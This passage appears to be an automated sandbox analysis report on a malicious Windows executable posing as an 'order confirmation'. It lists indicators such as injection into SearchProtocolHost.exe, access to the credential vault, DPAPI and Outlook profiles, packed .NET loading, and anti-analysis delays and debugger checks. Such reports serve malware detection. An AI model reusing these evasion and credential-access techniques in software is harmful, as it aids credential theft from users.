                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\order confirmation.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\order confirmation.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: order confirmation.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: order confirmation.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XDBtzWJieMe.exe, 00000008.00000002.2819410529.0000000000EBE000.00000002.00000001.01000000.0000000C.sdmp, XDBtzWJieMe.exe, 0000000A.00000002.2820406568.0000000000EBE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: order confirmation.exe, 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000003.1991485419.000000000332E000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000003.1983337784.0000000003179000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: order confirmation.exe, order confirmation.exe, 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, SearchProtocolHost.exe, 00000009.00000002.2821709960.000000000367E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000003.1991485419.000000000332E000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000002.2821709960.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000003.1983337784.0000000003179000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: SearchProtocolHost.pdbUGP source: XDBtzWJieMe.exe, 00000008.00000003.1919507373.0000000000FFB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: SearchProtocolHost.pdb source: XDBtzWJieMe.exe, 00000008.00000003.1919507373.0000000000FFB000.00000004.00000001.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.order confirmation.exe.5eb0000.3.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, pdPLqmV7ftO3csrOSh.cs.Net Code: ALd51SuoeM System.Reflection.Assembly.Load(byte[])
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, pdPLqmV7ftO3csrOSh.cs.Net Code: ALd51SuoeM System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 0_2_07D8A21A push eax; iretd 0_2_07D8A221
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_00414B10 push edx; retf A241h4_2_00414B38
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_00405057 push es; retf 4_2_00405075
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_00416074 push eax; retf 4_2_0041609C
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_00412176 push edx; iretd 4_2_00412179
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0040AC7B push es; retf 4_2_0040AC88
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_00403400 push eax; ret 4_2_00403402
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_00411CE9 push esp; retf 4_2_00411C7E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_00415FBD pushad ; retf 4_2_00415FBE
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B09AD push ecx; mov dword ptr [esp], ecx4_2_013B09B6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_034E225F pushad ; ret 9_2_034E27F9
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_034E27FA pushad ; ret 9_2_034E27F9
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_035109AD push ecx; mov dword ptr [esp], ecx9_2_035109B6
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_034E283D push eax; iretd 9_2_034E2858
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_034E135E push eax; iretd 9_2_034E1369
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009EE52B push ebp; retf 9_2_009EE533
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009EE8E6 push esp; retf 9_2_009EE87B
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009EED73 push edx; iretd 9_2_009EED76
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009F564E push eax; retf 9_2_009F564F
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009E7878 push es; retf 9_2_009E7885
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009FB9E3 push es; retf 9_2_009FB9E4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009E1C54 push es; retf 9_2_009E1C72
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009FBD02 push cs; iretd 9_2_009FBD05
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009FBD45 push FFFFFFB7h; retf 9_2_009FBD52
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033C634D push ebx; ret 9_2_033C634E
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033D51E2 push eax; ret 9_2_033D51E4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033CA42B push BF809140h; iretd 9_2_033CA430
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033C49A1 push ecx; ret 9_2_033C49B2
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033C5F21 push 0D885E92h; iretd 9_2_033C5F33
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033C5E9A push ebx; retf 9_2_033C5EAB
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033C4C5B push esp; iretd 9_2_033C4C61
                Source: order confirmation.exeStatic PE information: section name: .text entropy: 7.725344675276943
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, I01eWUa5a4YqRk1Pks.csHigh entropy of concatenated method names: 'ToString', 'g9iGmuvC0W', 'McKGfXQiO7', 'uSbGQW8Mrv', 'PpxGO9Hdjs', 'y2xGc39Esi', 'BMQGUd5Tjt', 'aLNG0l7K75', 'C4EG7dyC28', 'Vt4GrPGudV'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, NAyr630kycSMkRTekS.csHigh entropy of concatenated method names: 'rk4SAuS8bA', 'RwkSlI0SEN', 'd3FSFLc6yR', 'sHqFyV69oF', 'AmgFz8U9BL', 'wFhSgICalQ', 'rs9Sd25q7F', 'eWiSxlVnag', 'W5rSZEqTTB', 'R8rS5QDNVw'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, RXPtXddd34BOyV3B993.csHigh entropy of concatenated method names: 'vCbByPrf5f', 'uryBz5sus9', 'NMWMgJr2H4', 'mLjMdp2Kin', 'fNbMxDp3VV', 'FOAMZtlWHP', 'd4aM5aVFOx', 'pHXMEgvmWj', 'mOGMADd7qx', 'IueMhHrIem'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, CvrOpr8N5c52lFvUfQ.csHigh entropy of concatenated method names: 'xYUutOHaLG', 'w0Nu3461Fo', 'mxtuHh33JB', 'ANVufmM4IL', 'jwVuOqrk96', 'aLbuc6RELo', 'Dfnu0MOKHh', 'TNCu7Cgpt9', 'O94uogn0m0', 'swbum50a4v'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, hkt52UhSuFeE4wui5e.csHigh entropy of concatenated method names: 'Dispose', 'bjrdL13q7X', 'samxf2JKnv', 'vA7L9I3vWl', 'IsNdy6SYj6', 'DKJdzfsNkr', 'ProcessDialogKey', 'uWhxg3uUco', 'ajZxdMwaLF', 'GqYxx4uVIZ'
                Source: C:\Users\user\Desktop\order confirmation.exe	Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	API/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	API/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	API/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	API/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	API/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: C:\Users\user\Desktop\order confirmation.exe	Memory allocated: 1700000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\order confirmation.exe	Memory allocated: 3550000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\order confirmation.exe	Memory allocated: 1890000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\order confirmation.exe	Memory allocated: 95C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\order confirmation.exe	Memory allocated: 8030000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\order confirmation.exe	Memory allocated: A5C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\order confirmation.exe	Memory allocated: B5C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\order confirmation.exe	Code function: 4_2_013F096E rdtsc 4_2_013F096E
                Source: C:\Users\user\Desktop\order confirmation.exe	Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Window / User API: threadDelayed 651
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Window / User API: threadDelayed 9322
                Source: C:\Users\user\Desktop\order confirmation.exe	API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	API coverage: 2.6 %
                Source: C:\Users\user\Desktop\order confirmation.exe TID: 3640	Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 1384	Thread sleep count: 651 > 30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 1384	Thread sleep time: -1302000s >= -30000s
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 1384	Thread sleep count: 9322 > 30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 1384	Thread sleep time: -18644000s >= -30000s
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Last function: Thread delayed
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Code function: 9_2_009FC860 FindFirstFileW,FindNextFileW,FindClose, 9_2_009FC860
                Source: sE716IK71M.9.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: XDBtzWJieMe.exe, 0000000A.00000002.2819212672.000000000098F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
                Source: C:\Users\user\Desktop\order confirmation.exe	Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\order confirmation.exe	Process queried: DebugPort
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Process queried: DebugPort
                Source: C:\Users\user\Desktop\order confirmation.exe	Code function: 4_2_00417C23 LdrLoadDll, 4_2_00417C23
                Source: C:\Users\user\Desktop\order confirmation.exe	Code function: 4_2_01444144 mov eax, dword ptr fs:[00000030h] 4_2_01444144
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014760B8 mov eax, dword ptr fs:[00000030h]4_2_014760B8
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014760B8 mov ecx, dword ptr fs:[00000030h]4_2_014760B8
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01432349 mov eax, dword ptr fs:[00000030h]4_2_01432349
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0147A352 mov eax, dword ptr fs:[00000030h]4_2_0147A352
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01458350 mov ecx, dword ptr fs:[00000030h]4_2_01458350
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0143035C mov eax, dword ptr fs:[00000030h]4_2_0143035C
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0143035C mov eax, dword ptr fs:[00000030h]4_2_0143035C
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0143035C mov eax, dword ptr fs:[00000030h]4_2_0143035C
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0143035C mov ecx, dword ptr fs:[00000030h]4_2_0143035C
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0143035C mov eax, dword ptr fs:[00000030h]4_2_0143035C
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0143035C mov eax, dword ptr fs:[00000030h]4_2_0143035C
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AC310 mov ecx, dword ptr fs:[00000030h]4_2_013AC310
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013D0310 mov ecx, dword ptr fs:[00000030h]4_2_013D0310
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EA30B mov eax, dword ptr fs:[00000030h]4_2_013EA30B
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EA30B mov eax, dword ptr fs:[00000030h]4_2_013EA30B
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EA30B mov eax, dword ptr fs:[00000030h]4_2_013EA30B
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145437C mov eax, dword ptr fs:[00000030h]4_2_0145437C
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014363C0 mov eax, dword ptr fs:[00000030h]4_2_014363C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0146C3CD mov eax, dword ptr fs:[00000030h]4_2_0146C3CD
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014543D4 mov eax, dword ptr fs:[00000030h]4_2_014543D4
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014543D4 mov eax, dword ptr fs:[00000030h]4_2_014543D4
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145E3DB mov eax, dword ptr fs:[00000030h]4_2_0145E3DB
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145E3DB mov eax, dword ptr fs:[00000030h]4_2_0145E3DB
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145E3DB mov ecx, dword ptr fs:[00000030h]4_2_0145E3DB
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0145E3DB mov eax, dword ptr fs:[00000030h]4_2_0145E3DB
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013A8397 mov eax, dword ptr fs:[00000030h]4_2_013A8397
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013A8397 mov eax, dword ptr fs:[00000030h]4_2_013A8397
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013A8397 mov eax, dword ptr fs:[00000030h]4_2_013A8397
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013D438F mov eax, dword ptr fs:[00000030h]4_2_013D438F
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013D438F mov eax, dword ptr fs:[00000030h]4_2_013D438F
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AE388 mov eax, dword ptr fs:[00000030h]4_2_013AE388
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AE388 mov eax, dword ptr fs:[00000030h]4_2_013AE388
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AE388 mov eax, dword ptr fs:[00000030h]4_2_013AE388
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013E63FF mov eax, dword ptr fs:[00000030h]4_2_013E63FF
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013CE3F0 mov eax, dword ptr fs:[00000030h]4_2_013CE3F0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013CE3F0 mov eax, dword ptr fs:[00000030h]4_2_013CE3F0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013CE3F0 mov eax, dword ptr fs:[00000030h]4_2_013CE3F0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C03E9 mov eax, dword ptr fs:[00000030h]4_2_013C03E9
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C03E9 mov eax, dword ptr fs:[00000030h]4_2_013C03E9
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C03E9 mov eax, dword ptr fs:[00000030h]4_2_013C03E9
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C03E9 mov eax, dword ptr fs:[00000030h]4_2_013C03E9
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C03E9 mov eax, dword ptr fs:[00000030h]4_2_013C03E9
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C03E9 mov eax, dword ptr fs:[00000030h]4_2_013C03E9
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C03E9 mov eax, dword ptr fs:[00000030h]4_2_013C03E9
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C03E9 mov eax, dword ptr fs:[00000030h]4_2_013C03E9
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA3C0 mov eax, dword ptr fs:[00000030h]4_2_013BA3C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA3C0 mov eax, dword ptr fs:[00000030h]4_2_013BA3C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA3C0 mov eax, dword ptr fs:[00000030h]4_2_013BA3C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA3C0 mov eax, dword ptr fs:[00000030h]4_2_013BA3C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA3C0 mov eax, dword ptr fs:[00000030h]4_2_013BA3C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA3C0 mov eax, dword ptr fs:[00000030h]4_2_013BA3C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B83C0 mov eax, dword ptr fs:[00000030h]4_2_013B83C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B83C0 mov eax, dword ptr fs:[00000030h]4_2_013B83C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B83C0 mov eax, dword ptr fs:[00000030h]4_2_013B83C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B83C0 mov eax, dword ptr fs:[00000030h]4_2_013B83C0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01438243 mov eax, dword ptr fs:[00000030h]4_2_01438243
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01438243 mov ecx, dword ptr fs:[00000030h]4_2_01438243
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013A823B mov eax, dword ptr fs:[00000030h]4_2_013A823B
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0146A250 mov eax, dword ptr fs:[00000030h]4_2_0146A250
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_0146A250 mov eax, dword ptr fs:[00000030h]4_2_0146A250
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01460274 mov eax, dword ptr fs:[00000030h]4_2_01460274
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013A826B mov eax, dword ptr fs:[00000030h]4_2_013A826B
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B4260 mov eax, dword ptr fs:[00000030h]4_2_013B4260
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B4260 mov eax, dword ptr fs:[00000030h]4_2_013B4260
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B4260 mov eax, dword ptr fs:[00000030h]4_2_013B4260
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013B6259 mov eax, dword ptr fs:[00000030h]4_2_013B6259
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013AA250 mov eax, dword ptr fs:[00000030h]4_2_013AA250
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C02A0 mov eax, dword ptr fs:[00000030h]4_2_013C02A0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C02A0 mov eax, dword ptr fs:[00000030h]4_2_013C02A0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EE284 mov eax, dword ptr fs:[00000030h]4_2_013EE284
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013EE284 mov eax, dword ptr fs:[00000030h]4_2_013EE284
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01430283 mov eax, dword ptr fs:[00000030h]4_2_01430283
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01430283 mov eax, dword ptr fs:[00000030h]4_2_01430283
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_01430283 mov eax, dword ptr fs:[00000030h]4_2_01430283
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C02E1 mov eax, dword ptr fs:[00000030h]4_2_013C02E1
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C02E1 mov eax, dword ptr fs:[00000030h]4_2_013C02E1
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013C02E1 mov eax, dword ptr fs:[00000030h]4_2_013C02E1
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014462A0 mov eax, dword ptr fs:[00000030h]4_2_014462A0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014462A0 mov ecx, dword ptr fs:[00000030h]4_2_014462A0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014462A0 mov eax, dword ptr fs:[00000030h]4_2_014462A0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014462A0 mov eax, dword ptr fs:[00000030h]4_2_014462A0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014462A0 mov eax, dword ptr fs:[00000030h]4_2_014462A0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_014462A0 mov eax, dword ptr fs:[00000030h]4_2_014462A0
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA2C3 mov eax, dword ptr fs:[00000030h]4_2_013BA2C3
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA2C3 mov eax, dword ptr fs:[00000030h]4_2_013BA2C3
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA2C3 mov eax, dword ptr fs:[00000030h]4_2_013BA2C3
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA2C3 mov eax, dword ptr fs:[00000030h]4_2_013BA2C3
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013BA2C3 mov eax, dword ptr fs:[00000030h]4_2_013BA2C3
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DE53E mov eax, dword ptr fs:[00000030h]4_2_013DE53E
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013DE53E mov eax, dword ptr fs:[00000030h]4_2_013DE53E
